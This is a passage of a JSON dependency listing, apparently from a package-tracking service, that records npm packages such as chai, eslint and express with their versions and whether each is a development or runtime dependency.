","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":93892689,"package_name":"chai","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":93892690,"package_name":"chai-diff","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892691,"package_name":"chalk","ecosystem":"npm","requirements":"2.4.2","direct":false,"kind":"development","optional":false},{"id":93892692,"package_name":"ansi-styles","ecosystem":"npm","requirements":"3.2.1","direct":false,"kind":"development","optional":false},{"id":93892693,"package_name":"color-convert","ecosystem":"npm","requirements":"1.9.3","direct":false,"kind":"development","optional":false},{"id":93892694,"package_name":"color-name","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93892695,"package_name":"chardet","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":93892696,"package_name":"charm","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892697,"package_name":"check-error","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892698,"package_name":"chokidar","ecosystem":"npm","requirements":"1.5.2","direct":false,"kind":"development","optional":false},{"id":93892699,"package_name":"ci-info","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892700,"package_name":"class-utils","ecosystem":"npm","requirements":"0.3.6","direct":false,"kind":"development","optional":false},{"id":93892701,"package_name":"define-property","ecosystem":"npm","requirements":"0.2.5","direct":false,"kind":"development","optional":false},{"id":93892702,"package_name":"clean-stack","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93892703,"package_name":"cli","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892704,"package_name":"glob","ecosystem":"npm","requirements":"7.1.6","direct":false,"kind":"development","optional":false},{"id":93892705,"package_name":"cli-cursor","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892706,"package_name":"cli-truncate","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93892707,"package_name":"is-fullwidth-code-point","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892708,"package_name":"slice-ansi","ecosystem":"npm","requirements":"0.0.4","direct":false,"kind":"development","optional":false},{"id":93892709,"package_name":"string-width","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892710,"package_name":"cli-width","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":93892711,"package_name":"cliui","ecosystem":"npm","requirements":"7.0.4","direct":false,"kind":"runtime","optional":false},{"id":93892712,"package_name":"clone","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892713,"package_name":"code-point-at","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892714,"package_name":"collection-visit","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892715,"package_name":"color-convert","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"runtime","optional":false},{"id":93892716,"package_name":"color-name","ecosystem":"npm","requirements":"1.1.4","direct":false,"kind":"runtime","optional":false},{"id":93892717,"package_name":"colors","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93892718,"package_name":"combined-stream","ecosystem":"npm","requirements":"1.0.8","direct":false,"kind":"development","optional":false},{"id":93892719,"package_name":"command-exists","ecosystem":"npm","requirements":"1.2.9","direct":false,"kind":"development","optional":false},{"id":93892720,"package_name":"commander","ecosystem":"npm","requirements":"2.20.3","direct":false,"kind":"development","optional":false},{"id":93892721,"package_name":"commondir","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892722,"package_name":"commoner","ecosystem":"npm","requirements":"0.10.8","direct":false,"kind":"development","optional":false},{"id":93892723,"package_name":"esprima","ecosystem":"npm","requirements":"3.1.3","direct":false,"kind":"development","optional":false},{"id":93892724,"package_name":"recast","ecosystem":"npm","requirements":"0.11.23","direct":false,"kind":"development","optional":false},{"id":93892725,"package_name":"component-emitter","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":93892726,"package_name":"compressible","ecosystem":"npm","requirements":"2.0.18","direct":false,"kind":"development","optional":false},{"id":93892727,"package_name":"compression","ecosystem":"npm","requirements":"1.7.4","direct":false,"kind":"development","optional":false},{"id":93892728,"package_name":"bytes","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892729,"package_name":"concat-map","ecosystem":"npm","requirements":"0.0.1","direct":false,"kind":"development","optional":false},{"id":93892730,"package_name":"concat-stream","ecosystem":"npm","requirements":"1.6.2","direct":false,"kind":"development","optional":false},{"id":93892731,"package_name":"concurrently","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93892732,"package_name":"ansi-regex","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":93892733,"package_name":"cliui","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93892734,"package_name":"emoji-regex","ecosystem":"npm","requirements":"7.0.3","direct":false,"kind":"development","optional":false},{"id":93892735,"package_name":"find-up","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892736,"package_name":"is-fullwidth-code-point","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892737,"package_name":"locate-path","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892738,"package_name":"p-locate","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892739,"package_name":"path-exists","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892740,"package_name":"string-width","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892741,"package_name":"strip-ansi","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93892742,"package_name":"supports-color","ecosystem":"npm","requirements":"6.1.0","direct":false,"kind":"development","optional":false},{"id":93892743,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93892744,"package_name":"yargs","ecosystem":"npm","requirements":"13.3.2","direct":false,"kind":"development","optional":false},{"id":93892745,"package_name":"yargs-parser","ecosystem":"npm","requirements":"13.1.2","direct":false,"kind":"development","optional":false},{"id":93892746,"package_name":"connect","ecosystem":"npm","requirements":"3.7.0","direct":false,"kind":"development","optional":false},{"id":93892747,"package_name":"connect-history-api-fallback","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":93892748,"package_name":"connect-livereload","ecosystem":"npm","requirements":"0.5.4","direct":false,"kind":"development","optional":false},{"id":93892749,"package_name":"console-browserify","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93892750,"package_name":"console-control-strings","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892751,"package_name":"constants-browserify","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892752,"package_name":"content-disposition","ecosystem":"npm","requirements":"0.5.3","direct":false,"kind":"development","optional":false},{"id":93892753,"package_name":"content-type","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892754,"package_name":"continuable-cache","ecosystem":"npm","requirements":"0.3.1","direct":false,"kind":"development","optional":false},{"id":93892755,"package_name":"convert-source-map","ecosystem":"npm","requirements":"1.7.0","direct":false,"kind":"development","optional":false},{"id":93892756,"package_name":"cookie","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":93892757,"package_name":"cookie-signature","ecosystem":"npm","requirements":"1.0.6","direct":false,"kind":"development","optional":false},{"id":93892758,"package_name":"copy-descriptor","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93892759,"package_name":"core-js","ecosystem":"npm","requirements":"1.2.7","direct":false,"kind":"development","optional":false},{"id":93892760,"package_name":"core-util-is","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892761,"package_name":"cosmiconfig","ecosystem":"npm","requirements":"5.2.1","direct":false,"kind":"development","optional":false},{"id":93892762,"package_name":"import-fresh","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892763,"package_name":"resolve-from","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892764,"package_name":"cp-file","ecosystem":"npm","requirements":"6.2.0","direct":false,"kind":"development","optional":false},{"id":93892765,"package_name":"pify","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93892766,"package_name":"cross-spawn","ecosystem":"npm","requirements":"6.0.5","direct":false,"kind":"development","optional":false},{"id":93892767,"package_name":"crypto-browserify","ecosystem":"npm","requirements":"3.3.0","direct":false,"kind":"development","optional":false},{"id":93892768,"package_name":"currently-unhandled","ecosystem":"npm","requirements":"0.4.1","direct":false,"kind":"development","optional":false},{"id":93892769,"package_name":"dashdash","ecosystem":"npm","requirements":"1.14.1","direct":false,"kind":"development","optional":false},{"id":93892770,"package_name":"date-fns","ecosystem":"npm","requirements":"2.11.0","direct":false,"kind":"development","optional":false},{"id":93892771,"package_name":"dateformat","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":93892772,"package_name":"debug","ecosystem":"npm","requirements":"3.2.6","direct":false,"kind":"development","optional":false},{"id":93892773,"package_name":"decamelize","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93892774,"package_name":"decode-uri-component","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93892775,"package_name":"dedent","ecosystem":"npm","requirements":"0.7.0","direct":false,"kind":"development","optional":false},{"id":93892776,"package_name":"deep-eql","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892777,"package_name":"deep-is","ecosystem":"npm","requirements":"0.1.3","direct":false,"kind":"development","optional":false},{"id":93892778,"package_name":"default-require-extensions","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892779,"package_name":"strip-bom","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892780,"package_name":"define-lazy-prop","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":93892781,"package_name":"define-properties","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":93892782,"package_name":"define-property","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93892783,"package_name":"defined","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892784,"package_name":"defs","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892785,"package_name":"camelcase","ecosystem":"npm","requirements":"1.2.1","direct":false,"kind":"development","optional":false},{"id":93892786,"package_name":"cliui","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892787,"package_name":"wordwrap","ecosystem":"npm","requirements":"0.0.2","direct":false,"kind":"development","optional":false},{"id":93892788,"package_name":"y18n","ecosystem":"npm","requirements":"3.2.2","direct":false,"kind":"development","optional":false},{"id":93892789,"package_name":"yargs","ecosystem":"npm","requirements":"3.27.0","direct":false,"kind":"development","optional":false},{"id":93892790,"package_name":"del","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93892791,"package_name":"is-extglob","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":93892792,"package_name":"is-glob","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":93892793,"package_name":"slash","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892794,"package_name":"delayed-stream","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892795,"package_name":"delegates","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892796,"package_name":"depd","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93892797,"package_name":"destroy","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":93892798,"package_name":"detect-file","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892799,"package_name":"detect-indent","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892800,"package_name":"detective","ecosystem":"npm","requirements":"4.7.1","direct":false,"kind":"development","optional":false},{"id":93892801,"package_name":"acorn","ecosystem":"npm","requirements":"5.7.4","direct":false,"kind":"development","optional":false},{"id":93892802,"package_name":"diff","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":93892803,"package_name":"diff-sequences","ecosystem":"npm","requirements":"27.4.0","direct":false,"kind":"development","optional":false},{"id":93892804,"package_name":"dir-glob","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892805,"package_name":"path-type","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892806,"package_name":"dirty-chai","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892807,"package_name":"doctrine","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892808,"package_name":"domain-browser","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93892809,"package_name":"dustjs-linkedin","ecosystem":"npm","requirements":"2.7.5","direct":false,"kind":"development","optional":false},{"id":93892810,"package_name":"ecc-jsbn","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93892811,"package_name":"ee-first","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892812,"package_name":"electron-to-chromium","ecosystem":"npm","requirements":"1.4.30","direct":false,"kind":"development","optional":false},{"id":93892813,"package_name":"elegant-spinner","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892814,"package_name":"emoji-regex","ecosystem":"npm","requirements":"8.0.0","direct":false,"kind":"runtime","optional":false},{"id":93892815,"package_name":"emojis-list","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892816,"package_name":"encodeurl","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892817,"package_name":"end-of-stream","ecosystem":"npm","requirements":"1.4.4","direct":false,"kind":"development","optional":false},{"id":93892818,"package_name":"enhanced-resolve","ecosystem":"npm","requirements":"0.9.1","direct":false,"kind":"development","optional":false},{"id":93892819,"package_name":"memory-fs","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":93892820,"package_name":"errno","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":93892821,"package_name":"error","ecosystem":"npm","requirements":"7.2.1","direct":false,"kind":"development","optional":false},{"id":93892822,"package_name":"error-ex","ecosystem":"npm","requirements":"1.3.2","direct":false,"kind":"development","optional":false},{"id":93892823,"package_name":"es6-error","ecosystem":"npm","requirements":"4.1.1","direct":false,"kind":"development","optional":false},{"id":93892824,"package_name":"escalade","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"runtime","optional":false},{"id":93892825,"package_name":"escape-html","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892826,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":93892827,"package_name":"eslint","ecosystem":"npm","requirements":"6.8.0","direct":false,"kind":"development","optional":false},{"id":93892828,"package_name":"glob-parent","ecosystem":"npm","requirements":"5.1.2","direct":false,"kind":"development","optional":false},{"id":93892829,"package_name":"globals","ecosystem":"npm","requirements":"12.4.0","direct":false,"kind":"development","optional":false},{"id":93892830,"package_name":"strip-json-comments","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":93892831,"package_name":"eslint-config-prettier","ecosystem":"npm","requirements":"6.10.0","direct":false,"kind":"development","optional":false},{"id":93892832,"package_name":"get-stdin","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":93892833,"package_name":"eslint-plugin-compat","ecosystem":"npm","requirements":"3.13.0","direct":false,"kind":"development","optional":false},{"id":93892834,"package_name":"core-js","ecosystem":"npm","requirements":"3.20.1","direct":false,"kind":"development","optional":false},{"id":93892835,"package_name":"find-up","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93892836,"package_name":"locate-path","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":93892837,"package_name":"lru-cache","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":93892838,"package_name":"p-limit","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892839,"package_name":"p-locate","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93892840,"package_name":"semver","ecosystem":"npm","requirements":"7.3.5","direct":false,"kind":"development","optional":false},{"id":93892841,"package_name":"yallist","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892842,"package_name":"eslint-plugin-es5","ecosystem":"npm","requirements":"1.5.0","direct":false,"kind":"development","optional":false},{"id":93892843,"package_name":"eslint-scope","ecosystem":"npm","requirements":"5.0.0","direct":false,"kind":"development","optional":false},{"id":93892844,"package_name":"eslint-utils","ecosystem":"npm","requirements":"1.4.3","direct":false,"kind":"development","optional":false},{"id":93892845,"package_name":"eslint-visitor-keys","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892846,"package_name":"espree","ecosystem":"npm","requirements":"6.2.1","direct":false,"kind":"development","optional":false},{"id":93892847,"package_name":"esprima-fb","ecosystem":"npm","requirements":"15001.1001.0-dev-harmony-fb","direct":false,"kind":"development","optional":false},{"id":93892848,"package_name":"esquery","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892849,"package_name":"esrecurse","ecosystem":"npm","requirements":"4.2.1","direct":false,"kind":"development","optional":false},{"id":93892850,"package_name":"estraverse","ecosystem":"npm","requirements":"4.3.0","direct":false,"kind":"development","optional":false},{"id":93892851,"package_name":"esutils","ecosystem":"npm","requirements":"2.0.3","direct":false,"kind":"development","optional":false},{"id":93892852,"package_name":"etag","ecosystem":"npm","requirements":"1.8.1","direct":false,"kind":"development","optional":false},{"id":93892853,"package_name":"eventemitter2","ecosystem":"npm","requirements":"0.4.14","direct":false,"kind":"development","optional":false},{"id":93892854,"package_name":"eventemitter3","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":93892855,"package_name":"events","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892856,"package_name":"eventsource","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93892857,"package_name":"execa","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892858,"package_name":"exit","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93892859,"package_name":"expand-brackets","ecosystem":"npm","requirements":"0.1.5","direct":false,"kind":"development","optional":false},{"id":93892860,"package_name":"expand-range","ecosystem":"npm","requirements":"1.8.2","direct":false,"kind":"development","optional":false},{"id":93892861,"package_name":"expand-tilde","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":93892862,"package_name":"expect","ecosystem":"npm","requirements":"27.2.5","direct":false,"kind":"development","optional":false},{"id":93892863,"package_name":"ansi-styles","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93892864,"package_name":"express","ecosystem":"npm","requirements":"4.17.1","direct":false,"kind":"development","optional":false},{"id":93892865,"package_name":"path-to-regexp","ecosystem":"npm","requirements":"0.1.7","direct":false,"kind":"development","optional":false},{"id":93892866,"package_name":"extend","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892867,"package_name":"extend-shallow","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892868,"package_name":"is-extendable","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892869,"package_name":"external-editor","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":93892870,"package_name":"extglob","ecosystem":"npm","requirements":"0.3.2","direct":false,"kind":"development","optional":false},{"id":93892871,"package_name":"extract-zip","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892872,"package_name":"get-stream","ecosystem":"npm","requirements":"5.2.0","direct":false,"kind":"development","optional":false},{"id":93892873,"package_name":"extsprintf","ecosystem":"npm","requirements":"1.3.0","direct":false,"kind":"development","optional":false},{"id":93892874,"package_name":"fast-deep-equal","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":93892875,"package_name":"fast-glob","ecosystem":"npm","requirements":"3.2.2","direct":false,"kind":"development","optional":false},{"id":93892876,"package_name":"braces","ecosystem":"npm","requirements":"3.0.2","direct":false,"kind":"development","optional":false},{"id":93892877,"package_name":"fill-range","ecosystem":"npm","requirements":"7.0.1","direct":false,"kind":"development","optional":false},{"id":93892878,"package_name":"is-number","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":93892879,"package_name":"micromatch","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":93892880,"package_name":"to-regex-range","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":93892881,"package_name":"fast-json-stable-stringify","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892882,"package_name":"fast-levenshtein","ecosystem":"npm","requirements":"2.0.6","direct":false,"kind":"development","optional":false},{"id":93892883,"package_name":"fastq","ecosystem":"npm","requirements":"1.6.1","direct":false,"kind":"development","optional":false},{"id":93892884,"package_name":"faye-websocket","ecosystem":"npm","requirements":"0.10.0","direct":false,"kind":"development","optional":false},{"id":93892885,"package_name":"fd-slicer","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":93892886,"package_name":"figures","ecosystem":"npm","requirements":"3.2.0","direct":false,"kind":"development","optional":false},{"id":93892887,"package_name":"file-entry-cache","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":93892888,"package_name":"file-sync-cmp","ecosystem":"npm","requirements":"0.1.1","direct":false,"kind":"development","optional":false},{"id":93892889,"package_name":"file-uri-to-path","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892890,"package_name":"filename-regex","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892891,"package_name":"fill-range","ecosystem":"npm","requirements":"2.2.4","direct":false,"kind":"development","optional":false},{"id":93892892,"package_name":"finalhandler","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":93892893,"package_name":"find-cache-dir","ecosystem":"npm","requirements":"2.1.0","direct":false,"kind":"development","optional":false},{"id":93892894,"package_name":"pkg-dir","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":93892895,"package_name":"find-up","ecosystem":"npm","requirements":"4.1.0","direct":false,"kind":"development","optional":false},{"id":93892896,"package_name":"findup-sync","ecosystem":"npm","requirements":"0.3.0","direct":false,"kind":"development","optional":false},{"id":93892897,"package_name":"fined","ecosystem":"npm","requirements":"1.2.0","direct":false,"kind":"development","optional":false},{"id":93892898,"package_name":"flagged-respawn","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892899,"package_name":"flat-cache","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892900,"package_name":"flatted","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892901,"package_name":"follow-redirects","ecosystem":"npm","requirements":"1.15.1","direct":false,"kind":"development","optional":false},{"id":93892902,"package_name":"for-in","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892903,"package_name":"for-own","ecosystem":"npm","requirements":"0.1.5","direct":false,"kind":"development","optional":false},{"id":93892904,"package_name":"foreground-child","ecosystem":"npm","requirements":"1.5.6","direct":false,"kind":"development","optional":false},{"id":93892905,"package_name":"cross-spawn","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":93892906,"package_name":"forever-agent","ecosystem":"npm","requirements":"0.6.1","direct":false,"kind":"development","optional":false},{"id":93892907,"package_name":"form-data","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":93892908,"package_name":"forwarded","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93892909,"package_name":"fragment-cache","ecosystem":"npm","requirements":"0.2.1","direct":false,"kind":"development","optional":false},{"id":93892910,"package_name":"fresh","ecosystem":"npm","requirements":"0.5.2","direct":false,"kind":"development","optional":false},{"id":93892911,"package_name":"fs-constants","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892912,"package_name":"fs-extra","ecosystem":"npm","requirements":"8.1.0","direct":false,"kind":"development","optional":false},{"id":93892913,"package_name":"fs-readdir-recursive","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":93892914,"package_name":"fs.realpath","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892915,"package_name":"fsevents","ecosystem":"npm","requirements":"1.2.12","direct":false,"kind":"development","optional":false},{"id":93892916,"package_name":"are-we-there-yet","ecosystem":"npm","requirements":"1.1.5","direct":false,"kind":"development","optional":false},{"id":93892917,"package_name":"chownr","ecosystem":"npm","requirements":"1.1.4","direct":false,"kind":"development","optional":false},{"id":93892918,"package_name":"deep-extend","ecosystem":"npm","requirements":"0.6.0","direct":false,"kind":"development","optional":false},{"id":93892919,"package_name":"detect-libc","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":93892920,"package_name":"fs-minipass","ecosystem":"npm","requirements":"1.2.7","direct":false,"kind":"development","optional":false},{"id":93892921,"package_name":"gauge","ecosystem":"npm","requirements":"2.7.4","direct":false,"kind":"development","optional":false},{"id":93892922,"package_name":"has-unicode","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":93892923,"package_name":"iconv-lite","ecosystem":"npm","requirements":"0.4.24","direct":false,"kind":"development","optional":false},{"id":93892924,"package_name":"ignore-walk","ecosystem":"npm","requirements":"3.0.3","direct":false,"kind":"development","optional":false},{"id":93892925,"package_name":"inflight","ecosystem":"npm","requirements":"1.0.6","direct":false,"kind":"development","optional":false},{"id":93892926,"package_name":"inherits","ecosystem":"npm","requirements":"2.0.4","direct":false,"kind":"development","optional":false},{"id":93892927,"package_name":"ini","ecosystem":"npm","requirements":"1.3.5","direct":false,"kind":"development","optional":false},{"id":93892928,"package_name":"isarray","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":93892929,"package_name":"minimatch","ecosystem":"npm","requirements":"3.0.4","direct":false,"kind":"development","optional":false},{"id":93892930,"package_name":"minimist","ecosystem":"npm","requirements":"1.2.5","direct":false,"kind":"development","optional":false},{"id":93892931,"package_name":"minipass","ecosystem":"npm","requirements":"2.9.0","direct":false,"kind":"development","optional":false},{"id":93892932,"package_name":"minizlib","ecosystem":"npm","requirements":"1.3.3","direct":false,"kind":"development","optional":false},{"id":93892933,"package_name":"mkdirp","ecosystem":"npm","requirements":"0.5.3","direct":false,"kind":"development","optional":false},{"id":93892934,"package_name":"ms","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":93892935,"package_name":"needle","ecosystem":"npm","requirements":"2.3.3","direct":false,"kind":"development","optional":false},{"id":93892936,"package_name":"node-pre-gyp","ecosystem":"npm","requirements":"0.14.0","direct":false,"kind":"development","optional":false},{"id":93892937,"package_name":"nopt","ecosystem":"npm","requirements":"4.0.3","direct":false,"kind":"development","optional":false},{"id":93892938,"package_name":"npm-bundled","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":93892939,"package_name":"npm-normalize-package-bin","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892940,"package_name":"npm-packlist","ecosystem":"npm","requirements":"1.4.8","direct":false,"kind":"development","optional":false},{"id":93892941,"package_name":"npmlog","ecosystem":"npm","requirements":"4.1.2","direct":false,"kind":"development","optional":false},{"id":93892942,"package_name":"number-is-nan","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892943,"package_name":"once","ecosystem":"npm","requirements":"1.4.0","direct":false,"kind":"development","optional":false},{"id":93892944,"package_name":"os-homedir","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892945,"package_name":"os-tmpdir","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":93892946,"package_name":"osenv","ecosystem":"npm","requirements":"0.1.5","direct":false,"kind":"development","optional":false},{"id":93892947,"package_name":"path-is-absolute","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":93892948,"package_name":"process-nextick-args","ecosystem":"npm","requireme